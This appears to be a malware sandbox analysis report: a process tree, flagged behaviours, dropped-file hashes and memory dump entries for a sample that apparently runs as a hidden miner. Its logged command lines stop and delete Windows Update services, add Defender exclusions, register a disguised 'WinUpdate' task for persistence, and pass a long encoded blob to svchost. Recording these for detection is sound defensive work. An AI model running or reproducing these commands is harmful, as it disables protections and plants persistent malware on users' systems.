C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#byzbjm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fkljgvh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WinUpdate" } Else { "C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn WinUpdate3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#byzbjm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe nborjfiolo2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe dilrjejrohmoylhd 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2⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4224 -ip 42241⤵
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exeFilesize
5.3MB
MD589dc80d1824381e16f776f2d9fbe1e76
SHA1516abb8357a7af10794e483425503462b7c0f2ca
SHA256a10bdfb273bdf739ba824fb3675479c711c21b7361dcf3a305506f2a36b71145
SHA512651835d70194c6dae22ad25426b978e26eb2e8922b527f7b1b647c794a5e42548df8e37487e66d3d2994e918c0282fc466231a3c4e7fe2b95754b93040fd3e35
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exeFilesize
5.3MB
MD589dc80d1824381e16f776f2d9fbe1e76
SHA1516abb8357a7af10794e483425503462b7c0f2ca
SHA256a10bdfb273bdf739ba824fb3675479c711c21b7361dcf3a305506f2a36b71145
SHA512651835d70194c6dae22ad25426b978e26eb2e8922b527f7b1b647c794a5e42548df8e37487e66d3d2994e918c0282fc466231a3c4e7fe2b95754b93040fd3e35
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f7af91516561757ce2334224373083c6
SHA1b850ee37d868861caf32b9dfddcdeb0e5de63bce
SHA256697cfcb7c2163a0bde768e1e0ba2069582202e962bb16e6499c637567e1e6308
SHA5124bf2dcae51c6810a97a81ed0d33e2b9b2de7bccc12c16223428440b86e9bed187ddf91a5db23f76e635b7e510b90a35eecad16029afffb904a3fc58c7e494e9c
-
C:\Users\Admin\AppData\Local\Temp\tmp999F.tmp6qphtob5vjtm.exeFilesize
5.3MB
MD589dc80d1824381e16f776f2d9fbe1e76
SHA1516abb8357a7af10794e483425503462b7c0f2ca
SHA256a10bdfb273bdf739ba824fb3675479c711c21b7361dcf3a305506f2a36b71145
SHA512651835d70194c6dae22ad25426b978e26eb2e8922b527f7b1b647c794a5e42548df8e37487e66d3d2994e918c0282fc466231a3c4e7fe2b95754b93040fd3e35
-
C:\Users\Admin\AppData\Local\Temp\tmp999F.tmp6qphtob5vjtm.exeFilesize
5.3MB
MD589dc80d1824381e16f776f2d9fbe1e76
SHA1516abb8357a7af10794e483425503462b7c0f2ca
SHA256a10bdfb273bdf739ba824fb3675479c711c21b7361dcf3a305506f2a36b71145
SHA512651835d70194c6dae22ad25426b978e26eb2e8922b527f7b1b647c794a5e42548df8e37487e66d3d2994e918c0282fc466231a3c4e7fe2b95754b93040fd3e35
-
C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp8fqnwwfient.exeFilesize
3.0MB
MD5373d6b1f8629a4772a2c4712737c354c
SHA1b838869aa526ff259a52aa047b2944a0190af2dc
SHA256aeb2b4721064a6ab001202d567a8a04495ee923b19bcc5fbb4ef9ea47e758f54
SHA5128c22abefe68778679bfcdcd3d952ba2c91c21885ec9e82c7d6e390ed944bcb67c80c28c550759f59d89203a490230def0651316ef885aff3a22e82c41890147d
-
C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp8fqnwwfient.exeFilesize
3.0MB
MD5373d6b1f8629a4772a2c4712737c354c
SHA1b838869aa526ff259a52aa047b2944a0190af2dc
SHA256aeb2b4721064a6ab001202d567a8a04495ee923b19bcc5fbb4ef9ea47e758f54
SHA5128c22abefe68778679bfcdcd3d952ba2c91c21885ec9e82c7d6e390ed944bcb67c80c28c550759f59d89203a490230def0651316ef885aff3a22e82c41890147d
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
memory/100-204-0x00007FFF95850000-0x00007FFF96311000-memory.dmpFilesize
10.8MB
-
memory/100-203-0x00000245786C9000-0x00000245786CF000-memory.dmpFilesize
24KB
-
memory/100-193-0x00007FFF95850000-0x00007FFF96311000-memory.dmpFilesize
10.8MB
-
memory/100-205-0x00000245786C9000-0x00000245786CF000-memory.dmpFilesize
24KB
-
memory/228-177-0x00007FF733B40000-0x00007FF734415000-memory.dmpFilesize
8.8MB
-
memory/372-158-0x0000000000000000-mapping.dmp
-
memory/1268-169-0x00007FFF957A0000-0x00007FFF96261000-memory.dmpFilesize
10.8MB
-
memory/1268-170-0x00007FFF957A0000-0x00007FFF96261000-memory.dmpFilesize
10.8MB
-
memory/1340-165-0x0000000000000000-mapping.dmp
-
memory/1440-191-0x0000000000000000-mapping.dmp
-
memory/1660-197-0x0000000000000000-mapping.dmp
-
memory/1816-176-0x00007FFF95850000-0x00007FFF96311000-memory.dmpFilesize
10.8MB
-
memory/1816-173-0x00007FFF95850000-0x00007FFF96311000-memory.dmpFilesize
10.8MB
-
memory/1984-200-0x0000000000000000-mapping.dmp
-
memory/2116-167-0x0000000000000000-mapping.dmp
-
memory/2412-163-0x0000000000000000-mapping.dmp
-
memory/2424-194-0x0000000000000000-mapping.dmp
-
memory/2448-207-0x0000000000000000-mapping.dmp
-
memory/2840-198-0x0000000000000000-mapping.dmp
-
memory/3012-174-0x0000000000000000-mapping.dmp
-
memory/3060-155-0x00007FFF95840000-0x00007FFF96301000-memory.dmpFilesize
10.8MB
-
memory/3060-154-0x000002DC0F7D0000-0x000002DC0F7F2000-memory.dmpFilesize
136KB
-
memory/3060-156-0x00007FFF95840000-0x00007FFF96301000-memory.dmpFilesize
10.8MB
-
memory/3104-196-0x0000000000000000-mapping.dmp
-
memory/3228-199-0x0000000000000000-mapping.dmp
-
memory/3388-201-0x0000000000000000-mapping.dmp
-
memory/3404-166-0x0000000000000000-mapping.dmp
-
memory/3432-202-0x0000000000000000-mapping.dmp
-
